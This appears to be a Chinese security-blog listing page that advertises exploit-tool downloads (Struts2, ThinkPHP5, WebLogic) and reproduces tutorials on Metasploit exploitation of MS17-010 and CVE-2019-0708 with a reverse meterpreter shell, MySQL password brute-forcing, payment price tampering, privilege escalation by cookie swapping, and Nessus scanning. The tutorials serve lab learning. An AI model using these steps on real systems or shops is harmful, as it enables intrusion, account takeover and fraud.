精华内容
下载资源
问答
  • tp5漏洞利用工具.zip

    2020-01-03 18:02:43
    Thinkphp5代码执行漏洞利用工具 (一共两个 包含利用原理)只要检测到存在Thinkphp5漏洞都能直接getshell(没狗的情况下)
  • 1.NVD是美国国家通用漏洞数据库 2.漏洞数据包括2000年-2017年的漏洞数据(总共5万多条漏洞,23个漏洞类型) 3漏洞数据存储格式为xml,供软件安全研究人员使用。
  • 1.CNNVD是中国国家信息安全漏洞数据库 2.软件漏洞数据包括2002年-2017年的漏洞数据 3.漏洞数据存储格式为xml,供软件安全研究人员使用
  • Struts2漏洞检测工具,支持S2-057 CVE-2018-11776 、S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、 S2-032 CVE-2016-3081 、S2-020 CVE-2014-0094 、S2-019 CVE-2013-...
  • 相信研究过正方教务系统的朋友看到过网上传播的比较多的一篇文章提的/service.asmx中的BMCheckPassword存在注入,然而现在大多数正方教务已经将BMCheckPassword移除了,导致漏洞无法利用。本人研究了/service.asmx中...
  • 常见Exp漏洞POC集合

    2018-01-21 18:22:18
    该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流shulanyy@gmail.com,作为爱好他是免费的。
  • Struts2漏洞检查工具2018版,带最新的漏洞检查,方便使用。目前支持一键检测Struts2漏洞
  • java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
  • 从零开始学习软件漏洞挖掘系列教程
  • K8 Struts2 Exploit(Struts2综合漏洞利用工具)

    千次下载 热门讨论 2015-05-30 09:29:02
    K8 Struts2远程代码执行漏洞利用工具 (Apache Struts Remote Code Execution Exploit) Struts2漏洞检测工具 Struts2漏洞测试工具 K8 struts2 exploit Test Struts2 GetShell 目前已支持以下struts2漏洞编号 (S2-005 ...
  • 漏洞验证之metasploit实战

    千次阅读 多人点赞 2019-10-22 22:30:16
    Metasploit 是一款开源的渗透测试框架平台,可以用来信息收集、漏洞探测、漏洞利用等 渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的 Metasploit 是采用 Perl 语言编写的,但是再后来的新版中...

    一、metasploit简介

    Metasploit 是一款开源的渗透测试框架平台,可以用来信息收集、漏洞探测、漏洞利用等 渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的 Metasploit 是采用 Perl 语言编写的,但是再后来的新版中,改成了用 Ruby 语言编写的了,这使得使用者能够根 据需要对模块进行适当修改,甚至是调用自己写的测试模块。到目前为止,msf 已经内置了数 千个已披露的漏洞相关的模块和渗透测试工具,选定需要使用的攻击模块之后,你只需要使用 简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。
    msfconsloe:
    什么是 MSFconsole?该 msfconsole 可能是最常用的接口使用 Metasploit 框架(MSF)。 它提供了一个“一体化”集中控制台,并允许您高效访问 MSF 中可用的所有选项。MSFconsole 一开始似乎很吓人,但一旦学习了命令的语法,您将学会体会利用此接口的强大功能。
    ·启动 MSFconsole MSFconsole 通 过 从 命 令 行 简 单 运 行 msfconsole 启动。 MSFconsole 位于
    /usr/share/metasploit-framework/msfconsole 目录中。
    1.直接启动 root@kali:~# msfconsole
    2.通过-q 选项通过在安静模式下启动 msfconsole 来删除启动横幅。 root@kali:~# msfconsole –q
    ·如何使用命令提示符? 可以将-h 传递给 msfconsole 以查看可用的其他使用选项
    用法:msfconsole [选项]
    通用选项
    -E, --environment ENVIRONMENT 如果已设置,将使用 RAIL_ENV 环境变量。如果两个选项都不是 RAILS_ENV 环境变量,则默认为生产。
    数据库选项 -M,–migration-path DIRECTORY 指定包含其他数据库迁移的目录
    -n,–no-database 禁用数据库支持
    -y,–yaml PATH 指定一个包含数据库设置的 YAML 文件
    框架选项
    -c FILE 加载指定的配置文件
    -v,–version 显示版本
    模块选项
    –defer-module-loads 延迟模块加载,除非明确询问。
    -m,–module-path DIRECTORY 附加模块路径
    控制台选项 -a,–ask 在退出 Metasploit 之前询问或接受“exit-y”
    -H,–history-file FILE 将命令历史保存到指定的文件
    -L,–real-readline 使用系统 Readline 库而不是 RbReadline
    -o,–output 将文件输出到指定的文件
    -p,–plugin PLUGIN 在启动时加载插件
    -q,–quiet 不要在启动时打印横幅
    -r,–resource FILE 执行指定的资源文件
    ( - 用于 stdin)
    -x,–execute-command COMMAND 执行指定的字符串作为控制台命令(使用;用于 multiples)
    -h,–help 显示此消息 一旦在 msf 命令提示符下输入 help 或?将显示可用命令的列表以及它们用于的内容的描述。
    ·msf > help 核心命令
    ? 帮助菜单
    banner 显示一个真棒 metasploit 横幅
    cd 更改当前的工作目录
    color 切换颜色
    connect 连接与主机通信
    exit 退出控制台
    get 获取特定于上下文的变量的值
    getg 获取全局变量的值
    grep grep 另一个命令的输出
    help 帮助菜单
    history 显示命令历史
    irb 进入 irb 脚本模式
    load 加载一个框架插件
    quit 退出控制台
    route 通过会话路由流量
    save 保存活动的数据存储
    sessions 转储会话列表并显示有关会话的信息
    set 将特定于上下文的变量设置为一个值
    setg 将全局变量设置为一个值
    sleep 在指定的秒数内不做任何事情
    spool 将控制台输出写入文件以及屏幕
    threads 线程查看和操作后台线程
    unload 卸载框架插件
    unset 取消设置一个或多个特定于上下文的变量 unsetg 取消设置一个或多个全局变量
    version 显示框架和控制台库版本号 模块命令 advanced 显示一个或多个模块的高级选项
    back 从当前上下文返回 edit 使用首选编辑器编辑当前模块
    info 显示有关一个或多个模块的信息
    loadpath 路径从路径搜索并加载模块
    options 显示全局选项或一个或多个模块
    popm 将最新的模块从堆栈中弹出并使其处于活动状态
    previous 将之前加载的模块设置为当前模块 pushm 将活动或模块列表推入模块堆栈
    reload_all 从所有定义的模块路径重新加载所有模块
    search 搜索模块名称和描述
    show 显示给定类型的模块或所有模块
    use 按名称选择模块
    工作命令
    handler 作为作业启动负载处理程序
    jobs 显示和管理作业
    kill 杀死一个工作
    rename_job 重命名作业 资源脚本命令
    makerc 保存从开始到文件输入的命令
    resource 运行存储在文件中的命令 数据库后端命令
    db_connect 连接到现有的数据库
    db_disconnect 断开与当前数据库实例的连接
    db_export 导出包含数据库内容的文件
    db_import 导入扫描结果文件(文件类型将被自动检测)
    db_nmap 执行 nmap 并自动记录输出
    db_rebuild_cache 重建数据库存储的模块高速缓存
    db_status 显示当前的数据库状态
    hosts 列出数据库中的所有主机
    loot 列出数据库中的所有战利品
    notes 列出数据库中的所有笔记
    services 列出数据库中的所有服务
    vulns 列出数据库中的所有漏洞
    workspace 在数据库工作区之间切换
    凭证后端命令
    creds 列出数据库中的所有凭据
    metasploit 包含了多个模块,每个模块下都有很多相应的脚本,这些脚本在使用的时候可 以通过 search 命令来进行模糊搜索,如果需要全局的看和学习,也可以到 metasploit 下的 module 文件夹下查看。

     root@kali:/usr/share/metasploit-framework/modules# ls auxiliary  encoders  exploits  nops  payloads  post
    

    metasploit 的 auxitiary 模块也就是辅助模块,可用来进行主机发现、端口扫描、服务发现、 服务检测等。

    使用 use 后就会进入相应的脚本,命令 show options 用来展示脚本使用时的一些必要的参数,同 时也给出了参数的说明,例如 tcp 的端口扫描脚本,ports 用来设置端口,rhosts 用来设置目标 ip, threads 用来设置线程等,参数的设置用 set 命令

    payload:
    ·什么是 payload? payload 又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回 shell,也可以 进行程序注入等。也有人把 payloads 称 为 shellcode。

    ·payload 有几种类型:
    1、singles:独立载荷,可直接植入目标系统并执行相应的程序,如:shell_bind_tcp 这 个 payload。
    2、stagers:传输器载荷,用于目标机与攻击机之间建立稳定的网络连接,与传输体载荷 配合攻击。通常该种载荷体积都非常小,可以在漏洞利用后方便注入,这类载荷功能都非常相似,大致分为 bind 型和 reverse 型,bind 型是需要攻击机主动连接目标端口的;而 reverse 型是目标机会反连接攻击机,需要提前设定好连接攻击机的 ip 地址和端口号。
    3、stages:传输体载荷,如 shell,meterpreter 等。在 stagers 建立好稳定的连接后, 攻击机将 stages 传输给目标机,由 stagers 进行相应处理,将控制权转交给 stages。比如得 到目标机的 shell,或者 meterpreter 控制程序运行。这样攻击机可以在本端输入相应命令控 制目标机。
    正向连接使用场景:
    我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动 连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,被攻击机 上开了防火墙,只允许访问指定的端口,比如被攻击机只对外开放了 80 端口。那么,我们就只能设 置正向连接 80 端口了,这里很有可能失败,因为 80 端口上的流量太多了
    反向连接使用场景:
    我们的主机和被攻击机都是在外网或者都是在内网,这样被攻击机就能主 动连接到我们的主机了。如果是这样的情况,建议使用反向连接,因为反向连接的话,即使被攻击 机开了防火墙也没事,防火墙只是阻止进入被攻击机的流量,而不会阻止被攻击机主动向外连接的 流量。
    反向连接 80 和 443 端口使用场景:
    被攻击机能主动连接到我们的主机,还有就是被攻击机的防 火墙设置的特别严格,就连被攻击机访问外部网络的流量也进行了严格的限制,只允许被攻击机的80 端口或 443 端口与外部通信

    二、经典案例-基于ms17-010漏洞的利用操作

    使用方法:
    1.进入msfconsole框架
    在这里插入图片描述
    2.使用 search 命令查找相关漏洞: search ms17-010
    在这里插入图片描述
    3.使用 use 进入模块: use exploit/windows/smb/ms17_010_eternalblue
    在这里插入图片描述
    4.使用 info 查看模块信息: info
    在这里插入图片描述
    5. 设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
    在这里插入图片描述6.查看模块需要配置的参数:show options
    在这里插入图片描述
    7.设置参数:set RHOST 192.168.125.138 (此ip地址为目标机地址,端口可以默认也可以自己设置)
    在这里插入图片描述8.设置监听地址lhost(即攻击机地址)
    在这里插入图片描述
    9.攻击:exploit / run (攻击成功拿到目标机权限,输入?可以查看命令帮助)
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述

    三、CVE-2019-0708复现

    漏洞原理:CVE-2019-0708
    利用场景 未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。目标机开启3389端口,允许任意主机远程登录。

    注:由于漏洞为新出的,所以现在网上有的payload有点假,很大几率直接蓝屏。
    开搞~
    1.进入msfconsole 搜索漏洞(由于我的攻击机新安装的,所以有这个漏洞的payload,有些同学版本老,就需要自己网上下载再导入payload路径下了~~或者直接更新metasploit)
    在这里插入图片描述
    2.选择攻击的模块

    在这里插入图片描述
    3.设置目标机ip地址
    在这里插入图片描述4.设置攻击载荷
    在这里插入图片描述
    5.设置监听地址lhost
    在这里插入图片描述
    6.设置target,开始攻击
    在这里插入图片描述在这里插入图片描述

    四、渗透攻击mysql数据库服务器获取账户密码

    1.启动msfconsole
    在这里插入图片描述
    2.扫描所有有效mysql模块
    在这里插入图片描述
    3.这里使用 MySQL 扫描模块。
    在这里插入图片描述
    4.显示模块的有效选项。
    在这里插入图片描述
    5.为渗透攻击指定目标系统、用户文件和密码文件的位置。设置线程
    在这里插入图片描述
    6.开始爆破
    在这里插入图片描述成功获取用户和密码(注意这里爆破字典的选择很重要,也有可能爆不出来,要看字典里有没有)
    在这里插入图片描述成功进入目标数据库
    在这里插入图片描述

    注:仅供学习参考,切勿恶意用途!

    展开全文
  • [神器]K8 Struts2 Exp 20160516(Struts2综合漏洞利用工具) K8 Struts2 综合漏洞利用工具 (Apache Struts Remote Code Execution Exploit) Struts2漏洞检测工具 Struts2漏洞测试工具 K8 struts2 exploit Test Struts...
  • 权限漏洞:水平权限漏洞、垂直权限漏洞

    万次阅读 多人点赞 2019-07-31 19:21:31
    水平权限漏洞是指Web应用程序接收到用户请求时,没有判断数据的所属人,或者在判断数据所属人时是从用户提交的参数中获取了userid,导致攻击者可以自行修改userid修改不属于自己的数据。 漏洞示例: XXX/...

    水平权限漏洞是指Web应用程序接收到用户请求时,没有判断数据的所属人,或者在判断数据所属人时是从用户提交的参数中获取了userid,导致攻击者可以自行修改userid修改不属于自己的数据。

    漏洞示例:

    XXX/getAddress?id=1

    如上,攻击者修改addressId即可得到他人的address信息。开发容易习惯性的在生成CRUD(增查改删)表单(或AJAX请求)的时候根据认证过的用户身份来找出其有权限的被操作对象的id来提供入口,然后让用户提交请求,并根据这个id来操作相关对象。在处理CRUD请求时,都天真地默认只有有权限的用户才知道这个入口,进而才能操作相关对象,因此就不再校验权限了。可悲剧的是大多数对象的ID都被设置为自增整型,所以攻击者只要对相关id加1、减1、直至遍历,就可以操作其他用户所关联的对象了。

    修复方案:

    1、最正规的方案:把权限的控制转移到数据接口层中,避免出现select/update/delete ... where addressID=#addressID#的SQL语句,使用select/update/delete... where addressID=#addressID# and ownerId=#userId#来代替,要求web层在调用数据接口层的接口时额外提供userid,而这个userid在web层看来通常只能通过seesion来取到,以防用户造假。但这个方案的缺陷在于实现起来要改动底层的设计,所以不适合作为修复方案,更适合作为在最开始设计时的统一控制方案。

    2、最直接有效的修复方案:在web层的逻辑中做鉴权,检查提交CRUD请求的操作者(通过session或token等加密信息中得到,以防造假)与目标对象的权限所有者是否一致,如果不一致则阻断。这个方案实现成本低、能确保漏洞的修复质量,缺点是增加了一次查库操作。我之前一直用这种方案来对已发生的水平权限漏洞做紧急修复。

    另外的方法:

    1、可对ID加密

    2、使用UUID

    3、每一个信息增加一个发布人的字段,修改的人必须与发布的人为同一个人才可以访问

     

    垂直权限漏洞是指Web应用没有做权限控制,或仅仅在菜单上做了权限控制,导致恶意用户只要猜到了其他页面的URL,就可以访问或控制其他角色拥有的数据或页面,达到权限提升的目的。

    修复方案:

    只需要对url资源进行权限验证即可。

    展开全文
  • Android平台漏洞挖掘与利用

    热门讨论 2015-10-25 11:07:24
    由于Android的特殊生态,每款Android设备都存在多种来源的软件,而ROOT工具主要利用系统漏洞帮用户提升权限。CSDN【技术公开课】邀请到奇虎360高级安全研究员 吴家志博士详解了Android平台漏洞利用的原理以及漏洞...
  • 检测javaRMI反序列化漏洞
  • 逻辑漏洞之越权、支付漏洞

    千次阅读 多人点赞 2020-09-06 11:52:38
    目录逻辑漏洞Web安全渗透三大核心方向输入输出登录体系、权限认证业务逻辑漏洞分类1、登录体系安全暴力破解cookie安全加密测试登录验证绕过任意注册2、业务一致性安全手机号篡改邮箱和用户名更改订单ID更改商品编号...

    逻辑漏洞

    因为程序本身逻辑不严或逻辑太复杂,导致一些逻辑分支不能够正常处理或处理错误,造成的一系列漏洞

    Web安全渗透三大核心方向

    输入输出

    OWASP早期比较侧重的典型的web漏洞:注入、跨站、上传、代码执行等属于输入输出

    登录体系、权限认证

    近年来,越权漏洞、逻辑绕过、接口安全等逐渐增多,这些属于登录体系和权限认证

    业务逻辑漏洞分类

    1、登录体系安全

    暴力破解
     用弱密码字典,或者社工生成针对性的字典去爆破密码
    

    在线生成社工密码

    cookie安全
    有的网站对cookie不加密,也不base64编码,直接明文表示。可以自己重构组建cookie
    
    加密测试
    测试cookie、用户名、密码等敏感信息是否加密、使用了什么加密算法,然后解密
    
    登录验证绕过
    直接在url里输入要进入的页面路径、文件名,看能不能不登录就直接访问
    
    任意注册
    不验证手机号,不要求提供手机验证码(或者可绕过)。比如生成十亿条手机号,然后批量注册,将没有注册过的手机号都注册掉,影响正常用户的注册。
    或者只验证手机号,不验证是否注册过。比如这个手机号a用来注册一个微信号,然后a不用了,营业厅又把这个手机号卖给b了,b又拿着这个手机号注册了一个微信。结果b新注册的微信覆盖掉了a的微信(只是举例,纯属虚构)
    

    2、业务一致性安全

    手机号篡改
    抓包,将目标手机号改为自己的手机号,然后自己的手机号就接收到了验证码,有的网站只会验证验证码是否正确,没绑定用户,不验证是发给谁的。
    
    邮箱和用户名更改
    同上,只是改的是邮箱和用户名
    
    订单ID更改
    改ID,第一次下了5万的订单,第二次下一个5块钱的订单。可以抓包将第二次的订单号改成第一次的订单号。或者换成别人值钱的订单号,系统可能会将第一次的订单发两次
    
    商品编号更改
    改商品编号,比如本来买的是5毛钱的1号商品,改成50k的2号商品
    
    用户ID篡改
    使用自己的账号密码登录成功,获取登录成功的状态码。然后将ID换成别人的ID,系统如果只验证状态码的话,就会以别人的ID登录
    
    流程顺序
    比如一个自动售货机,本来应该是先收钱,再吐商品。换个顺序,就成了先吐商品,再收钱。然后你就能拿了商品就跑
    

    3、业务数据篡改

    金额数据篡改
    修改商品价格。0元购(一般是虚拟货币,比如用金币、Q币支付),0.01元购(一般是RMB支付,因为银行卡每次转账的金额必须大于等于0.01)
    
    商品数量篡改
    修改商品数量,本来只买1件衣服,改成买了100件衣服
    
    最大数限制突破
    比如特价商品限购1件,改成10件
    
    金额&优惠组合修改
    顾名思义,同上
    

    4、密码找回漏洞

    分析数据包,定位敏感信息
    在实现找回密码功能时,有些网站会在返回包里加入一些敏感内容
    
    分析找回机制
    看是通过邮箱验证码还是手机验证码验证用户身份的
    
    修改数据包验证
    改cookie等信息
    
    任意密码找回
    通过分析验证码、cookie、状态码找回、修改密码——或者跳过验证步骤、找回方式等步骤,直接跳到设置新密码界面
    

    5、验证码突破

    暴力破解
    验证码爆破,有的验证码就是0000-9999,可以一个一个试
    
    时间、次数突破
    有的验证码在一定时间内可以重复使用,比如使用手机验证码登录,然后登录完之后,还可以使用这个验证码修改密码(如果修改密码需要用到手机验证码的话),或者再重新登录一次
    
    回显测试
    进入找回密码页面,输入手机号,获取验证码,服务器会向手机发送验证码,可以抓包查看返回包信息,有时返回包中会包含验证码
    
    验证码绕过测试
    注册的时候需要手机验证码,此时可以随便填一个手机号。然后抓包改状态码,比如将0改为1,将false改为true
    
    验证检验机制猜解
    验证码生成有规律,可以猜测。比如是用户名加当前时间。比如这一次是0001,下一次是0002,下下一次是0003……验证码可控,我们能猜出下一次验证码是什么
    

    6、会话权限安全

    未授权访问
    顾名思义,没经过授权就访问。和登录测试绕过差不多,都是未授权(没有登录),就看到了本应登录才能看到的东西
    
    水平&垂直越权测试
    水平测试,用户a执行了用户b的操作;垂直越权,a执行了管理员的操作
    
    会话固定&会话劫持
    会话固定:诱骗受害者使用攻击者指定的会话标识(SessionID)的攻击手段。会话固定也可以看成是会话劫持的一种类型,只不过不是盗取受害者的session,而是让受害者使用攻击者指定的session。
    会话劫持:过盗取受害者Session ID,然后利用受害者的Session ID登录受害者的账号
    

    7、数据重放安全

    恶意注册
    同任意注册
    
    短信&邮件炸弹
    有的只在前端验证,比如60s后才能重新发送短信验证码,但是后端没有验证,可以让他一直重发,耗尽他短信池的流量,一般用来做DDoS
    
    内容编辑
    条件竞争
    比如上传一个木马,服务器识别到就会删除一个。同时发100000万个,然后不停的请求执行这个木马。在某一刻,服务器还没识别到这是个木马并删除的时候,你先请求执行这个木马——只要你上传的速度大于他删除的速度,总会成功请求一个的
    
    信息遍历
    比如有的网站,id=1,就返回1号用户的信息;id=2,就返回2号用户的信息……id=10000,就返回10000号用户的信息。重发的时候,可以设置id逐步加1,就能遍历所有人的信息
    

    8、数据接口安全

    APP接口webservice
    邮件&短信网关接口
    数据库接口
    三方接口

    一般来说,调用别人的接口都是有限制的,要么有次数限制,要么得花钱买。所以可以将用DDoS的方式耗光次数。而且在接口的位置可以爆破密码。

    在这里插入图片描述

    支付漏洞

    在这里插入图片描述

    1、抓包改价格

    在支付当中,购买商品一般分为三步骤:订购、确认信息、付款。随便哪个步骤都可以进行修改价格测试,若是前面两步也有验证机制,可以在最后一步付款时进行抓包尝试修改金额

    2、将未支付状态改为已支付

    改状态码

    3、用别人的银行卡支付

    将银行卡号换成别人的银行卡号

    演示

    进入靶场,点击立即购买
    在这里插入图片描述
    提示花费了100元购买了商品
    在这里插入图片描述

    抓包
    发现支付的金额就利用get传参明明白白写在这里
    在这里插入图片描述

    将价格改成0.01
    在这里插入图片描述放包,只花费了0.01元
    在这里插入图片描述

    越权漏洞

    分类

    1.根据对数据库的操作进行分类,可以分为以下几类:越权查询、越权删除、越权修改、越权添加等。
    2.根据维度进行分类,可分为:平行越权、垂直越权、交叉越权。

    这里讲的是根据维度进行分类

    危害

    越权漏洞的危害与影响主要是与对应业务的重要性相关,比如说某一页面服务器端响应(不局限于页面返回的信息,有时信息在响应包中,页面不一定能看见)中返回登录名、登录密码、手机号、身份证等敏感信息,如果存在平行越权,通过对用户ID的遍历,就可以查看所有用户的敏感信息,这也是一种变相的脱裤,而且很难被防火墙发现,因为这和正常的访问请求没有什么区别,也不会包含特殊字符,具有十足的隐秘性。

    如何检测

    最简单的方式,通过定位鉴权参数,然后替换为其他账户鉴权参数的方法来发现越权漏洞。

    水平越权

    定义

    水平越权,就是权限类型不变,权限ID改变。比如a,b两个普通用户,a只能看a的资料,b只能看b的资料。但是a通过修改用户名或者其他参数,看到了b的资料,就是水平越权。
    在这里插入图片描述

    演示

    点一下提示,看到了用户,密码信息。
    在这里插入图片描述
    使用lucy登录
    在这里插入图片描述

    查看个人信息,是lucy的信息
    在这里插入图片描述

    刷新界面,抓个包,将lucy改为lili
    在这里插入图片描述

    在这里插入图片描述

    此时,查看个人信息,显示的是lili的信息
    在这里插入图片描述

    垂直越权

    定义

    权限ID不变,权限类型改变。比如linux里面普通用户使用sudo提权,id未变,权限变了。
    比如服务器是通过验证某个字段的值来判断用户的权限,比如role为1则为管理员,role为0则为普通用户,普通用户通过手动修改role的值,欺骗服务器,达到提权的目的。

    如果普通用户和管理员用户不在一个表里。则使用更改cookie的方法来提权。
    在这里插入图片描述

    演示

    查看提示,知道了普通用户pikachu的密码,登录pikachu
    在这里插入图片描述
    此时发现只有查看权限
    在这里插入图片描述
    退出登录,使用admin用户登录
    在这里插入图片描述添加一个用户

    在这里插入图片描述创建的时候抓包,然后发送给重发器(Ctrl+R)
    在这里插入图片描述
    在这里插入图片描述

    发完之后将包放了
    在这里插入图片描述
    退出admin的用户登录,此时再以pikachu的身份登录

    在这里插入图片描述
    这个时候已经admin创建的1用户已经生效了
    在这里插入图片描述

    刷新一下,抓个包,复制pikachu用户的cookie的值

    在这里插入图片描述

    回到重发器
    将这里原本admin的cookie改为pikachu的cookie,用户的账号密码也改一下,以区分之前创建的1用户
    在这里插入图片描述
    点击发送,刷新一下页面,多了个2用户
    在这里插入图片描述

    水平垂直越权

    顾名思义,这是前两个的合集。可以这么理解:技术部的员工干了人事部部长的事…………

    越权漏洞修复方案

    1、基础安全架构,完善用户权限体系。要知道哪些数据对于哪些用户,哪些数据不应该由哪些用户操作;
    2、鉴权,服务端对请求的数据和当前用户身份做校验;
    3、不要直接使用对象的实名或关键字。
    4、对于可控参数进行严格的检查与过滤!
    
    展开全文
  • 使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1....
  • Kali学习 | 漏洞扫描:3.2 使用Nessus扫描漏洞扫描本地漏洞扫描网络漏洞扫描指定Linux的系统漏洞扫描指定Windows的系统漏洞 扫描本地漏洞 (1)新建名为Local Vulnerability Assessment策略。 (2)添加所需的插件...

    扫描本地漏洞

    (1)新建名为Local Vulnerability Assessment策略。

    (2)添加所需的插件程序。
    Ubuntu Local Security Checks:扫描本地Ubuntu安全检查。
    Default Unix Accounts:扫描默认Unix账户。

    (3)新建名为Sample Scan扫描任务。

    (4)扫描漏洞。扫描任务执行完成后,将显示如图所示的界面。
    在这里插入图片描述
    (5)在该界面双击扫描任务名称SampleScan,将显示扫描的详细信息,如图所示。
    在这里插入图片描述
    (6)从该界面可以看到总共扫描了三台主机。
    扫描主机的漏洞情况,可以查看Vulnerability列,该列中的数字表示扫描到的信息数。右侧显示了扫描的详细信息,如扫描任务名称、状态、策略、目标主机和时间等。右下角以圆形图显示了漏洞的危险情况,分别使用不同颜色显示漏洞的严重性。
    本机几乎没任何漏洞,所以显示是蓝色(Info)。
    关于漏洞的信息使用在该界面可以单击Host列中的任何一个地址,显示该主机的详细信息,包括IP地址、操作系统类型、扫描的起始时间和结束时间等。
    本例中选择192.168.41.234地址,如图所示。
    在这里插入图片描述
    (7)在该界面单击INFO按钮,将显示具体的漏洞信息,如图所示。
    在这里插入图片描述
    (8)该界面显示了漏洞的描述信息及扫描到的信息。例如,该主机上开启了68、8834和15774等端口。
    使用Nessus还可以通过导出文件的方式查看漏洞信息,导出的文件格式包括Nessus、PDF、HTML、CSV和NessusDB。
    导出文件的方式如下所示:在图中单击Export按钮,选择导出文件的格式。
    在这里插入图片描述
    这里选择PDF格式,单击PDF命令,将显示如图所示的界面。
    在这里插入图片描述
    (9)该界面分为两部分,包括Available Content(可用的内容)和Report Content(报告内容)。
    该界面显示了导出的PDF文件中可包括的内容有主机摘要信息、主机漏洞和插件漏洞。
    在上图中将要导出的内容用鼠标拖到Report Content框中,拖入内容后将显示如图所示的界面。
    在这里插入图片描述
    (10)在该界面显示了将要导出的内容。此时单击Export按钮,将显示如图所示的界面。
    在这里插入图片描述
    (11)在该界面单击Save File按钮,指定该文件的保存位置,即PDF文件导出成功。

    扫描网络漏洞

    (1)新建名为Internal Network Scan策略。
    (2)添加所需的插件程序。

    CISCO					扫描CISCO系统
    DNS						扫描DNS服务器
    Default Unix Accounts 	扫描本地默认用户账户和密码
    FTP						扫描FTP服务器
    Firewalls				扫描代理防火墙
    Gain a shell remotely 	扫描远程获取的Shell
    Geeral					扫描常用的服务
    Netware					扫描网络操作系统
    Peer-To-Peer File Sharing	扫描共享文件检测
    Policy Compliance 			扫描PCIDSS和SCAP信息
    SCADA				扫描设置管理工具
    SMTP Problems		扫描SMTP问题
    SNMP				扫描SNMP相关信息
    Service Detection	扫描服务侦察
    Settings			扫描基本设置
    

    (3)新建名为Network Scan扫描任务。
    (4)扫描结果如图所示。
    在这里插入图片描述
    (5)从该界面可以看到有两个比较严重的漏洞。如果想要详细地分析该漏洞,建议将该信息使用文件的形式导出。

    扫描指定Linux的系统漏洞

    (1)使用Metasploitable2.0作为目标主机。用户也可以使用其他版本的Linux系统
    (2)新建名为Linux Vulnerability Scan策略。
    (3)添加所需的插件程序。

    Backdoors						扫描秘密信息
    Brute Force Attacks				暴力攻击
    CentOSo Local Security Checks 	扫描CentOS系统的本地安全漏洞
    DNS								扫描DNS服务器
    Debian Local Security Checks 	扫描Debian系统的本地安全漏洞
    Default Unix Accounts			扫描默认Unix用户账号
    Denial of Service 				扫描拒绝的服务
    FTP								扫描FTP服务器
    Fedora Local Security Checks 	扫描Fedora系统的本地安全漏洞
    Firewalls						扫描防火墙
    FreeBSD Local Security Checks 	扫描FreeBSD系统的本地安全漏洞
    Gain a shell remotely			扫描远程获得的Shell
    General							扫描漏洞
    Gentoo Local Security Checks	扫描Gentoo系统的本地安全漏洞
    HP-UX Local Security Checks 	扫描HP-UX系统的本地安全漏洞
    Mandriva Local Security Checks 	扫描Mandriva系统的本地安全漏洞
    Misc							扫描复杂的漏洞
    Red Hat Local Security Checks 	扫描Red Hat系统的本地安全漏洞
    SMTP Porblems 					扫描SMTP问题
    SNMP							扫描SNMP漏洞
    Scientific Linux Local Security Checks 	扫描Scientific Linux系统的本地安全漏洞
    Slackware Local Security Checks 		扫描Slackware系统的本地安全漏洞
    Solaris Local Security Checks 			扫描Solaris系统的本地安全漏洞
    SuSE Local Security Checks 				扫描SuSE系统的本地安全漏洞
    Ubuntu Local Security Checks 			扫描Ubuntu系统的本地安全漏洞
    Web Servers								扫描Web服务器
    

    (4)新建名为Linux Vulnerability Scan扫描任务。
    (5)扫描漏洞,扫描结果如图所示。
    在这里插入图片描述
    (6)从该界面可以看到总共扫描了6台主机上的漏洞信息。其中,主机192.168.41.142上存在7个比较严重的漏洞。关于漏洞的百分比情况,可以从右下角的扇形图中了解到。同样,用户可以使用前面介绍过的两种方法,查看漏洞的详细信息。

    扫描指定Windows的系统漏洞

    本例中使用Windows7系统作为目标主机。
    具体扫描步骤如下所示。
    (1)新建名为Windows Vulnerability Scan策略。
    (2)添加所需的插件程序。

    DNS					扫描DNS服务器
    Denial of Service 	扫描拒绝的服务
    SMTP Problems		扫描SMTP问题
    SNMP				扫描SNMP
    Settings			扫描设置信息
    Web Servers			扫描Web Servers
    Windows:Microsoft Buletins	扫描Windows中微软公告
    Windows:User management 	扫描Windows用户管理
    

    (3)开始扫描漏洞。扫描结果如图所示。
    在这里插入图片描述
    (4)从该界面可以看到主机192.168.41.1的漏洞情况,该主机中存在一个比较严重的漏洞。同样用户可以使用前面介绍过的两种方法查看漏洞的详细信息,进而修改主机中存在的漏洞。

    参考书籍:《Kali Linux渗透测试技术详解》

    展开全文
  • 漏洞详解

    千次阅读 2019-09-03 11:14:35
    漏洞的定义 官方定义:漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的下访问或破坏系统。 基本理解:漏洞是协议在生命周期的各个阶段(设计、实现、运维...
  • 【2017版】Struts2漏洞检查工具

    热门讨论 2017-07-18 17:20:09
    最新Struts2漏洞检查工具2017版,支持045,046,048验证
  • 软件漏洞分析简述

    万次阅读 2020-02-04 01:36:59
    软件漏洞 1.1漏洞的定义 漏洞,也叫脆弱性(英语:Vulnerability),是指计算机系统安全方面的缺陷,使得系统或其应用数据的保密性、完整性、可用性、访问控制等面临威胁。 漏洞在各时间阶段的名称 根据是否公开分为...
  • 揭秘家用路由器0day漏洞挖掘技术

    千次下载 热门讨论 2015-08-14 15:48:48
    全球第一本关于家用路由器底层安全分析的书籍!系统剖析路由器硬件分析之道。技术要点与实践可延伸到智能物联、工控系统等新兴领域!吴石、余弦推荐!
  • fastjson远程代码执行漏洞问题分析

    千次阅读 2020-03-01 16:15:11
